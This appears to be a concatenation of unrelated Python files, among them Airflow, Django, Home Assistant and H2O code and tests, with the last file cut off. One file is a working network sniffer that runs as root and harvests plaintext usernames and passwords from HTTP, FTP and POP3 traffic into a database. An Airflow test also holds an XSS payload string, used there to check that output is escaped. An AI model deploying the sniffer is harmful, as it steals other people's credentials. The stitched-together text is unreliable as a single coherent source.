from google.cloud.redis_v1.gapic.enums import FailoverInstanceRequest, Instance
from airflow import models
from airflow.operators.bash import BashOperator
from airflow.providers.google.cloud.operators.cloud_memorystore import (
CloudMemorystoreCreateInstanceAndImportOperator, CloudMemorystoreCreateInstanceOperator,
CloudMemorystoreDeleteInstanceOperator, CloudMemorystoreExportAndDeleteInstanceOperator,
CloudMemorystoreExportInstanceOperator, CloudMemorystoreFailoverInstanceOperator,
CloudMemorystoreGetInstanceOperator, CloudMemorystoreImportOperator,
CloudMemorystoreListInstancesOperator, CloudMemorystoreScaleInstanceOperator,
CloudMemorystoreUpdateInstanceOperator,
)
from airflow.providers.google.cloud.operators.gcs import GCSBucketCreateAclEntryOperator
from airflow.utils import dates
GCP_PROJECT_ID = os.environ.get("GCP_PROJECT_ID", "example-project")
INSTANCE_NAME = os.environ.get("GCP_MEMORYSTORE_INSTANCE_NAME", "test-memorystore")
INSTANCE_NAME_2 = os.environ.get("GCP_MEMORYSTORE_INSTANCE_NAME2", "test-memorystore-2")
INSTANCE_NAME_3 = os.environ.get("GCP_MEMORYSTORE_INSTANCE_NAME3", "test-memorystore-3")
EXPORT_GCS_URL = os.environ.get("GCP_MEMORYSTORE_EXPORT_GCS_URL", "gs://test-memorystore/my-export.rdb")
EXPORT_GCS_URL_PARTS = urlparse(EXPORT_GCS_URL)
BUCKET_NAME = EXPORT_GCS_URL_PARTS.netloc
FIRST_INSTANCE = {"tier": Instance.Tier.BASIC, "memory_size_gb": 1}
SECOND_INSTANCE = {"tier": Instance.Tier.STANDARD_HA, "memory_size_gb": 3}
default_args = {"start_date": dates.days_ago(1)}
with models.DAG(
"gcp_cloud_memorystore",
default_args=default_args,
schedule_interval=None, # Override to match your needs
tags=['example'],
) as dag:
# [START howto_operator_create_instance]
create_instance = CloudMemorystoreCreateInstanceOperator(
task_id="create-instance",
location="europe-north1",
instance_id=INSTANCE_NAME,
instance=FIRST_INSTANCE,
project_id=GCP_PROJECT_ID,
)
# [END howto_operator_create_instance]
# [START howto_operator_create_instance_result]
create_instance_result = BashOperator(
task_id="create-instance-result",
bash_command="echo \"{{ task_instance.xcom_pull('create-instance') }}\"",
)
# [END howto_operator_create_instance_result]
create_instance_2 = CloudMemorystoreCreateInstanceOperator(
task_id="create-instance-2",
location="europe-north1",
instance_id=INSTANCE_NAME_2,
instance=SECOND_INSTANCE,
project_id=GCP_PROJECT_ID,
)
# [START howto_operator_get_instance]
get_instance = CloudMemorystoreGetInstanceOperator(
task_id="get-instance", location="europe-north1", instance=INSTANCE_NAME, project_id=GCP_PROJECT_ID
)
# [END howto_operator_get_instance]
# [START howto_operator_get_instance_result]
get_instance_result = BashOperator(
task_id="get-instance-result", bash_command="echo \"{{ task_instance.xcom_pull('get-instance') }}\""
)
# [END howto_operator_get_instance_result]
# [START howto_operator_failover_instance]
failover_instance = CloudMemorystoreFailoverInstanceOperator(
task_id="failover-instance",
location="europe-north1",
instance=INSTANCE_NAME_2,
data_protection_mode=FailoverInstanceRequest.DataProtectionMode.LIMITED_DATA_LOSS,
project_id=GCP_PROJECT_ID,
)
# [END howto_operator_failover_instance]
# [START howto_operator_list_instances]
list_instances = CloudMemorystoreListInstancesOperator(
task_id="list-instances", location="-", page_size=100, project_id=GCP_PROJECT_ID
)
# [END howto_operator_list_instances]
# [START howto_operator_list_instances_result]
list_instances_result = BashOperator(
task_id="list-instances-result", bash_command="echo \"{{ task_instance.xcom_pull('get-instance') }}\""
)
# [END howto_operator_list_instances_result]
# [START howto_operator_update_instance]
update_instance = CloudMemorystoreUpdateInstanceOperator(
task_id="update-instance",
location="europe-north1",
instance_id=INSTANCE_NAME,
project_id=GCP_PROJECT_ID,
update_mask={"paths": ["memory_size_gb"]},
instance={"memory_size_gb": 2},
)
# [END howto_operator_update_instance]
# [START howto_operator_set_acl_permission]
set_acl_permission = GCSBucketCreateAclEntryOperator(
task_id="gcs-set-acl-permission",
bucket=BUCKET_NAME,
entity="user-{{ task_instance.xcom_pull('get-instance')['persistenceIamIdentity']"
".split(':', 2)[1] }}",
role="OWNER",
)
# [END howto_operator_set_acl_permission]
# [START howto_operator_export_instance]
export_instance = CloudMemorystoreExportInstanceOperator(
task_id="export-instance",
location="europe-north1",
instance=INSTANCE_NAME,
output_config={"gcs_destination": {"uri": EXPORT_GCS_URL}},
project_id=GCP_PROJECT_ID,
)
# [END howto_operator_export_instance]
# [START howto_operator_import_instance]
import_instance = CloudMemorystoreImportOperator(
task_id="import-instance",
location="europe-north1",
instance=INSTANCE_NAME_2,
input_config={"gcs_source": {"uri": EXPORT_GCS_URL}},
project_id=GCP_PROJECT_ID,
)
# [END howto_operator_import_instance]
# [START howto_operator_delete_instance]
delete_instance = CloudMemorystoreDeleteInstanceOperator(
task_id="delete-instance", location="europe-north1", instance=INSTANCE_NAME, project_id=GCP_PROJECT_ID
)
# [END howto_operator_delete_instance]
delete_instance_2 = CloudMemorystoreDeleteInstanceOperator(
task_id="delete-instance-2",
location="europe-north1",
instance=INSTANCE_NAME_2,
project_id=GCP_PROJECT_ID,
)
# [END howto_operator_create_instance_and_import]
create_instance_and_import = CloudMemorystoreCreateInstanceAndImportOperator(
task_id="create-instance-and-import",
location="europe-north1",
instance_id=INSTANCE_NAME_3,
instance=FIRST_INSTANCE,
input_config={"gcs_source": {"uri": EXPORT_GCS_URL}},
project_id=GCP_PROJECT_ID,
)
# [START howto_operator_create_instance_and_import]
# [START howto_operator_scale_instance]
scale_instance = CloudMemorystoreScaleInstanceOperator(
task_id="scale-instance",
location="europe-north1",
instance_id=INSTANCE_NAME_3,
project_id=GCP_PROJECT_ID,
memory_size_gb=3,
)
# [END howto_operator_scale_instance]
# [END howto_operator_export_and_delete_instance]
export_and_delete_instance = CloudMemorystoreExportAndDeleteInstanceOperator(
task_id="export-and-delete-instance",
location="europe-north1",
instance=INSTANCE_NAME_3,
output_config={"gcs_destination": {"uri": EXPORT_GCS_URL}},
project_id=GCP_PROJECT_ID,
)
# [START howto_operator_export_and_delete_instance]
create_instance >> get_instance >> get_instance_result
create_instance >> update_instance
create_instance >> create_instance_result
create_instance >> export_instance
create_instance_2 >> import_instance
create_instance >> list_instances >> list_instances_result
list_instances >> delete_instance
update_instance >> delete_instance
get_instance >> set_acl_permission >> export_instance
export_instance >> import_instance
export_instance >> delete_instance
import_instance >> delete_instance_2
create_instance_2 >> failover_instance
failover_instance >> delete_instance_2
export_instance >> create_instance_and_import >> scale_instance >> export_and_delete_instance
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("zerver", "0342_realm_demo_organization_scheduled_deletion_date"),
]
operations = [
migrations.AlterIndexTogether(
name="useractivityinterval",
index_together={("user_profile", "end")},
),
]
|
import subprocess
from utils import *
@all_files_in_dir('util_clk_reset')
@all_available_simulators()
def test_mock_uvm_report(datafiles, simulator):
with datafiles.as_cwd():
subprocess.check_call(['runSVUnit', '-s', simulator])
expect_testrunner_pass('run.log')
|
"""This code example gets all premium rates belonging to a specific rate card.
To create premium rates, run create_premium_rates.py.
"""
from googleads import dfp
RATE_CARD_ID = 'INSERT_RATE_CARD_ID_HERE'
def main(client, rate_card_id):
# Initialize appropriate service.
premium_rate_service = client.GetService('PremiumRateService',
version='v201505')
# Create statement object to select a single proposal by an ID.
values = [{
'key': 'rateCardId',
'value': {
'xsi_type': 'NumberValue',
'value': rate_card_id
}
}]
query = 'WHERE rateCardId = :rateCardId ORDER BY id ASC'
statement = dfp.FilterStatement(query, values)
# Get premium rates by statement.
while True:
response = premium_rate_service.getPremiumRatesByStatement(
statement.ToStatement())
if 'results' in response:
# Display results.
for premium_rate in response['results']:
print ('Premium rate with ID \'%s\' of type \'%s\' assigned to '
' rate card with ID \'%s\' was found.\n' % (
premium_rate['id'],
dfp.DfpClassType(premium_rate['premiumFeature']),
premium_rate['rateCardId']))
statement.offset += dfp.SUGGESTED_PAGE_LIMIT
else:
break
print '\nNumber of results found: %s' % response['totalResultSetSize']
if __name__ == '__main__':
# Initialize client object.
dfp_client = dfp.DfpClient.LoadFromStorage()
main(dfp_client, RATE_CARD_ID)
|
import dpkt
import pcap
import re
import socket
import urlparse
import binascii
import signal
import sys
import os
import argparse
import rethinkdb as r
from rethinkdb.errors import RqlRuntimeError, RqlDriverError
from pprint import pprint
from utils import add_colons_to_mac
RDB_HOST = os.environ.get('RDB_HOST') or 'localhost'
RDB_PORT = os.environ.get('RDB_PORT') or 28015
PWD_DB = 'passwords'
APP = {80: 'HTTP', 23: 'TELNET', 21: 'FTP', 110: 'POP3'}
def dbSetup():
connection = r.connect(host=RDB_HOST, port=RDB_PORT)
try:
r.db_create(PWD_DB).run(connection)
r.db(PWD_DB).table_create('pwd_table').run(connection)
r.db(PWD_DB).table_create('status_table').run(connection)
# Initial status value
r.db(PWD_DB).table('status_table').insert([{"status": "ON"}]).run(connection)
print '[-] Database setup completed. Now run the sniffer without --setup.'
except RqlRuntimeError:
print '[-] Sniffer database already exists. Run the sniffer without --setup.'
finally:
connection.close()
class Sniffer(object):
def __init__(self, *args, **kwargs):
try:
self.rdb_conn = r.connect(host=RDB_HOST, port=RDB_PORT, db=PWD_DB)
except RqlDriverError:
sys.exit("[!] No database connection could be established.")
cursor = r.table("status_table").run(self.rdb_conn)
for document in cursor:
self.status_id = document.get('id')
# Status ON
r.table('status_table').get(self.status_id).update({"status": "ON"}).run(self.rdb_conn)
pattern = 'tcp and dst port 80 or dst port 21'
# pattern = 'tcp and dst port 80 or dst port 21 or dst port 110'
self.pc = pcap.pcap(kwargs['interface'])
self.pc.setfilter(pattern)
self.all_user_info = {}
self.devices_mac = {}
self.info_counter = 0
def _is_host(self, content):
regex = re.compile('Host: (.*)')
return content is not None and regex.search(content)
def _is_pwd(self, content):
regex = re.compile('(.*)[password]=(.*)')
return content is not None and regex.search(content)
def _is_pwd_with_txt(self, content):
regex = re.compile('(.*)[txtPwd]=(.*)')
return content is not None and regex.search(content)
def _pick_ftp_info(self, data, client, server, dport, eth_src):
self.devices_mac.setdefault(add_colons_to_mac(eth_src), {})
self.devices_mac[add_colons_to_mac(eth_src)]['client'] = client
self.devices_mac[add_colons_to_mac(eth_src)]['server'] = server
self.devices_mac[add_colons_to_mac(eth_src)]['app'] = APP.get(dport)
self.devices_mac[add_colons_to_mac(eth_src)]['mac'] = (
add_colons_to_mac(eth_src))
if data.get('USER'):
self.devices_mac[add_colons_to_mac(eth_src)].update(
{'login': data.get('USER')})
if data.get('PASS'):
self.devices_mac[add_colons_to_mac(eth_src)].update(
{'password': data.get('PASS')})
device_info = self.devices_mac[add_colons_to_mac(eth_src)]
if 'login' and 'password' in device_info.keys():
print "[-] FTP New Password get:"
pprint(self.devices_mac[add_colons_to_mac(eth_src)])
r.table('pwd_table').insert([self.devices_mac[add_colons_to_mac(eth_src)]]).run(self.rdb_conn)
# When push to firebase delete it
del self.devices_mac[add_colons_to_mac(eth_src)]
def _pick_http_info(self, data, client, server, dport, eth_src):
self.info_counter += 1
self.all_user_info[self.info_counter] = (
{'client': client, 'server': server,
'app': APP.get(dport),
'mac': add_colons_to_mac(binascii.hexlify(eth_src))}
)
if data.get('account'):
self.all_user_info[self.info_counter].update(
{'login': data.get('account')[0]})
elif data.get('username'):
self.all_user_info[self.info_counter].update(
{'login': data.get('username')[0]})
elif data.get('identification'):
self.all_user_info[self.info_counter].update({
'login': data.get('identification')[0]})
elif data.get('id'):
self.all_user_info[self.info_counter].update(
{'login': data.get('id')[0]})
elif data.get('os_username'):
self.all_user_info[self.info_counter].update(
{'login': data.get('os_username')[0]})
elif data.get('txtAccount'):
self.all_user_info[self.info_counter].update(
{'login': data.get('txtAccount')[0]})
elif data.get('email'):
self.all_user_info[self.info_counter].update(
{'login': data.get('email')[0]})
else:
self.all_user_info[self.info_counter].update({'login': None})
if data.get('password'):
self.all_user_info[self.info_counter].update(
{'password': data.get('password')[0]})
elif data.get('os_password'):
self.all_user_info[self.info_counter].update(
{'password': data.get('os_password')[0]})
elif data.get('txtPwd'):
self.all_user_info[self.info_counter].update(
{'password': data.get('txtPwd')[0]})
else:
self.all_user_info[self.info_counter].update({'password': None})
print "[-] HTTP New Password get:"
pprint(self.all_user_info[self.info_counter])
r.table('pwd_table').insert([self.all_user_info[self.info_counter]]).run(self.rdb_conn)
def _get_ftp_pop_payload(self, eth_pkt, ip_pkt, tcp_pkt):
if 'USER' in tcp_pkt.data:
regex = re.compile('USER (.*)')
user_obj = regex.search(tcp_pkt.data)
user_d = {'USER': user_obj.group(1).rstrip('\r')}
self._pick_ftp_info(user_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'PASS' in tcp_pkt.data:
regex = re.compile('PASS (.*)')
password_obj = regex.search(tcp_pkt.data)
password_d = {'PASS': password_obj.group(1).rstrip('\r')}
self._pick_ftp_info(password_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'user' in tcp_pkt.data:
regex = re.compile('user (.*)')
user_obj = regex.search(tcp_pkt.data)
user_d = {'USER': user_obj.group(1).rstrip('\r')}
self._pick_ftp_info(user_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
elif 'pass' in tcp_pkt.data:
regex = re.compile('pass (.*)')
password_obj = regex.search(tcp_pkt.data)
password_d = {'PASS': password_obj.group(1).rstrip('\r')}
self._pick_ftp_info(password_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst), tcp_pkt.dport,
binascii.hexlify(eth_pkt.src))
else:
return
def _get_http_payload(self, eth_pkt, ip_pkt, tcp_pkt):
try:
http_req = dpkt.http.Request(tcp_pkt.data)
if http_req.method == 'POST':
# This is POST method
pass
except dpkt.dpkt.UnpackError:
pass
if 'POST' in tcp_pkt.data:
# print 'POST', tcp.data
if 'password=' in tcp_pkt.data:
# print 'In POST packet password', tcp.data
pwd_obj = self._is_pwd(tcp_pkt.data)
if pwd_obj:
# print 'query string found:', pwd_obj.group(0)
qs_d = urlparse.parse_qs(pwd_obj.group(0))
# print qs_d
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'password=' in tcp_pkt.data:
# print 'password', tcp.data
qs_d = urlparse.parse_qs(tcp_pkt.data)
# print qs_d
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'txtPwd=' in tcp_pkt.data:
qs_d = urlparse.parse_qs(tcp_pkt.data)
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
elif 'email=' in tcp_pkt.data:
qs_d = urlparse.parse_qs(tcp_pkt.data)
self._pick_http_info(qs_d, socket.inet_ntoa(ip_pkt.src),
socket.inet_ntoa(ip_pkt.dst),
tcp_pkt.dport, eth_pkt.src)
else:
return
# Moocs dst IP 140.114.60.144
# Kits dst IP 74.125.204.121
# iLMS dst IP 140.114.69.137
def loop(self):
# result = {'status': 'ON'}
# cursor = r.table("status_table").get(self.status_id).changes().run(self.rdb_conn)
# print status_result
# for document in cursor:
# print document.get('status')
while True:
result = r.table("status_table").get(self.status_id).run(self.rdb_conn)
# pdb.set_trace()
if result.get('status') == 'ON':
try:
for ts, buf in self.pc:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
tcp = ip.data
if len(tcp.data) > 0:
# print 'Packet in dst port number', tcp.dport
# make sure the pattern is correct
if tcp.dport == 80:
self._get_http_payload(eth, ip, tcp)
elif tcp.dport == 21 or tcp.dport == 110:
self._get_ftp_pop_payload(eth, ip, tcp)
else:
pass
except KeyboardInterrupt:
nrecv, ndrop, nifdrop = self.pc.stats()
print '\n[-] %d packets received by filter' % nrecv
print '[-] %d packets dropped by kernel' % ndrop
break
except (NameError, TypeError):
# print "No packet"
continue
else:
signal.signal(signal.SIGINT, lambda s, f: sys.exit(0))
print "[-] I can not see packets."
continue
def __del__(self):
# Status OFF
r.table('status_table').get(self.status_id).update({"status": "OFF"}).run(self.rdb_conn)
result = r.table("status_table").get(self.status_id).run(self.rdb_conn)
print '[*] Sniffer is %s' % result['status']
# pdb.set_trace()
try:
self.rdb_conn.close()
except AttributeError:
pass
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Run the Sniffer')
parser.add_argument('--setup', dest='run_setup', action='store_true')
parser.add_argument("-s", '--interface',
help='Specify an interface',
default='eth0')
args = parser.parse_args()
if args.run_setup:
dbSetup()
else:
if os.geteuid():
sys.exit('[-] Please run as root')
s = Sniffer(interface=args.interface)
print '[*] Using interface:', s.pc.name
s.loop()
|
"""Support for RESTful binary sensors."""
import httpx
import voluptuous as vol
from homeassistant.components.binary_sensor import (
DEVICE_CLASSES_SCHEMA,
PLATFORM_SCHEMA,
BinarySensorEntity,
)
from homeassistant.const import (
CONF_AUTHENTICATION,
CONF_DEVICE_CLASS,
CONF_FORCE_UPDATE,
CONF_HEADERS,
CONF_METHOD,
CONF_NAME,
CONF_PARAMS,
CONF_PASSWORD,
CONF_PAYLOAD,
CONF_RESOURCE,
CONF_RESOURCE_TEMPLATE,
CONF_TIMEOUT,
CONF_USERNAME,
CONF_VALUE_TEMPLATE,
CONF_VERIFY_SSL,
HTTP_BASIC_AUTHENTICATION,
HTTP_DIGEST_AUTHENTICATION,
)
from homeassistant.exceptions import PlatformNotReady
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.reload import async_setup_reload_service
from . import DOMAIN, PLATFORMS
from .data import DEFAULT_TIMEOUT, RestData
DEFAULT_METHOD = "GET"
DEFAULT_NAME = "REST Binary Sensor"
DEFAULT_VERIFY_SSL = True
DEFAULT_FORCE_UPDATE = False
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Exclusive(CONF_RESOURCE, CONF_RESOURCE): cv.url,
vol.Exclusive(CONF_RESOURCE_TEMPLATE, CONF_RESOURCE): cv.template,
vol.Optional(CONF_AUTHENTICATION): vol.In(
[HTTP_BASIC_AUTHENTICATION, HTTP_DIGEST_AUTHENTICATION]
),
vol.Optional(CONF_HEADERS): {cv.string: cv.string},
vol.Optional(CONF_PARAMS): {cv.string: cv.string},
vol.Optional(CONF_METHOD, default=DEFAULT_METHOD): vol.In(["POST", "GET"]),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_PASSWORD): cv.string,
vol.Optional(CONF_PAYLOAD): cv.string,
vol.Optional(CONF_DEVICE_CLASS): DEVICE_CLASSES_SCHEMA,
vol.Optional(CONF_USERNAME): cv.string,
vol.Optional(CONF_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_VERIFY_SSL, default=DEFAULT_VERIFY_SSL): cv.boolean,
vol.Optional(CONF_FORCE_UPDATE, default=DEFAULT_FORCE_UPDATE): cv.boolean,
vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,
}
)
PLATFORM_SCHEMA = vol.All(
cv.has_at_least_one_key(CONF_RESOURCE, CONF_RESOURCE_TEMPLATE), PLATFORM_SCHEMA
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the REST binary sensor."""
await async_setup_reload_service(hass, DOMAIN, PLATFORMS)
name = config.get(CONF_NAME)
resource = config.get(CONF_RESOURCE)
resource_template = config.get(CONF_RESOURCE_TEMPLATE)
method = config.get(CONF_METHOD)
payload = config.get(CONF_PAYLOAD)
verify_ssl = config.get(CONF_VERIFY_SSL)
timeout = config.get(CONF_TIMEOUT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
headers = config.get(CONF_HEADERS)
params = config.get(CONF_PARAMS)
device_class = config.get(CONF_DEVICE_CLASS)
value_template = config.get(CONF_VALUE_TEMPLATE)
force_update = config.get(CONF_FORCE_UPDATE)
if resource_template is not None:
resource_template.hass = hass
resource = resource_template.async_render(parse_result=False)
if value_template is not None:
value_template.hass = hass
if username and password:
if config.get(CONF_AUTHENTICATION) == HTTP_DIGEST_AUTHENTICATION:
auth = httpx.DigestAuth(username, password)
else:
auth = (username, password)
else:
auth = None
rest = RestData(
hass, method, resource, auth, headers, params, payload, verify_ssl, timeout
)
await rest.async_update()
if rest.data is None:
raise PlatformNotReady
async_add_entities(
[
RestBinarySensor(
hass,
rest,
name,
device_class,
value_template,
force_update,
resource_template,
)
],
)
class RestBinarySensor(BinarySensorEntity):
"""Representation of a REST binary sensor."""
def __init__(
self,
hass,
rest,
name,
device_class,
value_template,
force_update,
resource_template,
):
"""Initialize a REST binary sensor."""
self._hass = hass
self.rest = rest
self._name = name
self._device_class = device_class
self._state = False
self._previous_data = None
self._value_template = value_template
self._force_update = force_update
self._resource_template = resource_template
@property
def name(self):
"""Return the name of the binary sensor."""
return self._name
@property
def device_class(self):
"""Return the class of this sensor."""
return self._device_class
@property
def available(self):
"""Return the availability of this sensor."""
return self.rest.data is not None
@property
def is_on(self):
"""Return true if the binary sensor is on."""
if self.rest.data is None:
return False
response = self.rest.data
if self._value_template is not None:
response = self._value_template.async_render_with_possible_json_value(
self.rest.data, False
)
try:
return bool(int(response))
except ValueError:
return {"true": True, "on": True, "open": True, "yes": True}.get(
response.lower(), False
)
@property
def force_update(self):
"""Force update."""
return self._force_update
async def async_update(self):
"""Get the latest data from REST API and updates the state."""
if self._resource_template is not None:
self.rest.set_url(self._resource_template.async_render(parse_result=False))
await self.rest.async_update()
|
import mock
from manila.tests import fake_compute
class FakeServiceInstanceManager(object):
def __init__(self, *args, **kwargs):
self.db = mock.Mock()
self._helpers = {
'CIFS': mock.Mock(),
'NFS': mock.Mock(),
}
self.share_networks_locks = {}
self.share_networks_servers = {}
self.fake_server = fake_compute.FakeServer()
self.service_instance_name_template = 'manila_fake_service_instance-%s'
def get_service_instance(self, context, share_network_id, create=True):
return self.fake_server
def _create_service_instance(self, context, instance_name,
share_network_id, old_server_ip):
return self.fake_server
def _delete_server(self, context, server):
pass
def _get_service_instance_name(self, share_network_id):
return self.service_instance_name_template % share_network_id
|
from __future__ import print_function
import sys, os
sys.path.insert(1, os.path.join("..","..",".."))
import h2o
from tests import pyunit_utils
from h2o.estimators.deepwater import H2ODeepWaterEstimator
def deepwater_multi():
if not H2ODeepWaterEstimator.available(): return
frame = h2o.import_file(pyunit_utils.locate("bigdata/laptop/deepwater/imagenet/cat_dog_mouse.csv"))
print(frame.head(5))
model = H2ODeepWaterEstimator(epochs=50, learning_rate=1e-3)
model.train(x=[0],y=1, training_frame=frame)
model.show()
error = model.model_performance(train=True).mean_per_class_error()
assert error < 0.1, "mean classification error is too high : " + str(error)
if __name__ == "__main__":
pyunit_utils.standalone_test(deepwater_multi)
else:
deepwater_multi()
|
"""
Event beans for Pelix.
:author: Thomas Calmant
:copyright: Copyright 2014, isandlaTech
:license: Apache License 2.0
:version: 0.5.8
:status: Beta
..
Copyright 2014 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
__version_info__ = (0, 5, 8)
__version__ = ".".join(str(x) for x in __version_info__)
__docformat__ = "restructuredtext en"
from pelix.utilities import Deprecated
class BundleEvent(object):
"""
Represents a bundle event
"""
INSTALLED = 1
"""The bundle has been installed."""
STARTED = 2
"""The bundle has been started."""
STARTING = 128
"""The bundle is about to be activated."""
STOPPED = 4
"""
The bundle has been stopped. All of its services have been unregistered.
"""
STOPPING = 256
"""The bundle is about to deactivated."""
STOPPING_PRECLEAN = 512
"""
The bundle has been deactivated, but some of its services may still remain.
"""
UNINSTALLED = 16
"""The bundle has been uninstalled."""
UPDATED = 8
"""The bundle has been updated. (called after STARTED) """
UPDATE_BEGIN = 32
""" The bundle will be updated (called before STOPPING) """
UPDATE_FAILED = 64
""" The bundle update has failed. The bundle might be in RESOLVED state """
def __init__(self, kind, bundle):
"""
Sets up the event
"""
self.__kind = kind
self.__bundle = bundle
def __str__(self):
"""
String representation
"""
return "BundleEvent({0}, {1})".format(self.__kind, self.__bundle)
def get_bundle(self):
"""
Retrieves the modified bundle
"""
return self.__bundle
def get_kind(self):
"""
Retrieves the kind of event
"""
return self.__kind
class ServiceEvent(object):
"""
Represents a service event
"""
REGISTERED = 1
""" This service has been registered """
MODIFIED = 2
""" The properties of a registered service have been modified """
UNREGISTERING = 4
""" This service is in the process of being unregistered """
MODIFIED_ENDMATCH = 8
"""
The properties of a registered service have been modified and the new
properties no longer match the listener's filter
"""
def __init__(self, kind, reference, previous_properties=None):
"""
Sets up the event
:param kind: Kind of event
:param reference: Reference to the modified service
:param previous_properties: Previous service properties (for MODIFIED
and MODIFIED_ENDMATCH events)
"""
self.__kind = kind
self.__reference = reference
if previous_properties is not None \
and not isinstance(previous_properties, dict):
# Accept None or dict() only
previous_properties = {}
self.__previous_properties = previous_properties
def __str__(self):
"""
String representation
"""
return "ServiceEvent({0}, {1})".format(self.__kind, self.__reference)
def get_previous_properties(self):
"""
Returns the previous values of the service properties, meaningless if
the the event is not MODIFIED nor MODIFIED_ENDMATCH.
:return: The previous properties of the service
"""
return self.__previous_properties
def get_service_reference(self):
"""
Returns the reference to the service associated to this event
:return: A ServiceReference object
"""
return self.__reference
def get_kind(self):
"""
Returns the kind of service event (see the constants)
:return: the kind of service event
"""
return self.__kind
@Deprecated("ServiceEvent: get_type() must be replaced by get_kind()")
def get_type(self):
"""
**DEPRECATED:** Use get_kind() instead
Retrieves the kind of service event.
"""
return self.__kind
|
import unittest
from datetime import datetime
from unittest import mock
from urllib.parse import parse_qs
from bs4 import BeautifulSoup
from parameterized import parameterized
from airflow.www import utils
from tests.test_utils.config import conf_vars
class TestUtils(unittest.TestCase):
def test_empty_variable_should_not_be_hidden(self):
self.assertFalse(utils.should_hide_value_for_key(""))
self.assertFalse(utils.should_hide_value_for_key(None))
def test_normal_variable_should_not_be_hidden(self):
self.assertFalse(utils.should_hide_value_for_key("key"))
def test_sensitive_variable_should_be_hidden(self):
self.assertTrue(utils.should_hide_value_for_key("google_api_key"))
def test_sensitive_variable_should_be_hidden_ic(self):
self.assertTrue(utils.should_hide_value_for_key("GOOGLE_API_KEY"))
def check_generate_pages_html(self, current_page, total_pages,
window=7, check_middle=False):
extra_links = 4 # first, prev, next, last
search = "'>\"/><img src=x onerror=alert(1)>"
html_str = utils.generate_pages(current_page, total_pages,
search=search)
self.assertNotIn(search, html_str,
"The raw search string shouldn't appear in the output")
self.assertIn('search=%27%3E%22%2F%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E',
html_str)
self.assertTrue(
callable(html_str.__html__),
"Should return something that is HTML-escaping aware"
)
dom = BeautifulSoup(html_str, 'html.parser')
self.assertIsNotNone(dom)
ulist = dom.ul
ulist_items = ulist.find_all('li')
self.assertEqual(min(window, total_pages) + extra_links, len(ulist_items))
page_items = ulist_items[2:-2]
mid = int(len(page_items) / 2)
for i, item in enumerate(page_items):
a_node = item.a
href_link = a_node['href']
node_text = a_node.string
if node_text == str(current_page + 1):
if check_middle:
self.assertEqual(mid, i)
self.assertEqual('javascript:void(0)', href_link)
self.assertIn('active', item['class'])
else:
self.assertRegex(href_link, r'^\?', 'Link is page-relative')
query = parse_qs(href_link[1:])
self.assertListEqual(query['page'], [str(int(node_text) - 1)])
self.assertListEqual(query['search'], [search])
def test_generate_pager_current_start(self):
self.check_generate_pages_html(current_page=0,
total_pages=6)
def test_generate_pager_current_middle(self):
self.check_generate_pages_html(current_page=10,
total_pages=20,
check_middle=True)
def test_generate_pager_current_end(self):
self.check_generate_pages_html(current_page=38,
total_pages=39)
def test_params_no_values(self):
"""Should return an empty string if no params are passed"""
self.assertEqual('', utils.get_params())
def test_params_search(self):
self.assertEqual('search=bash_',
utils.get_params(search='bash_'))
@parameterized.expand([
(True, False, ''),
(False, True, ''),
(True, True, 'showPaused=True'),
(False, False, 'showPaused=False'),
(None, True, ''),
(None, False, ''),
])
def test_params_show_paused(self, show_paused, hide_by_default, expected_result):
with conf_vars({('webserver', 'hide_paused_dags_by_default'): str(hide_by_default)}):
self.assertEqual(expected_result,
utils.get_params(showPaused=show_paused))
@parameterized.expand([
(True, False, True),
(False, True, True),
(True, True, False),
(False, False, False),
(None, True, True),
(None, False, True),
])
def test_should_remove_show_paused_from_url_params(self, show_paused,
hide_by_default, expected_result):
with conf_vars({('webserver', 'hide_paused_dags_by_default'): str(hide_by_default)}):
self.assertEqual(
expected_result,
utils._should_remove_show_paused_from_url_params(
show_paused,
hide_by_default
)
)
def test_params_none_and_zero(self):
query_str = utils.get_params(a=0, b=None)
# The order won't be consistent, but that doesn't affect behaviour of a browser
pairs = list(sorted(query_str.split('&')))
self.assertListEqual(['a=0', 'b='], pairs)
def test_params_all(self):
query = utils.get_params(showPaused=False, page=3, search='bash_')
self.assertEqual(
{'page': ['3'],
'search': ['bash_'],
'showPaused': ['False']},
parse_qs(query)
)
def test_params_escape(self):
self.assertEqual('search=%27%3E%22%2F%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E',
utils.get_params(search="'>\"/><img src=x onerror=alert(1)>"))
def test_open_maybe_zipped_normal_file(self):
with mock.patch(
'io.open', mock.mock_open(read_data="data")) as mock_file:
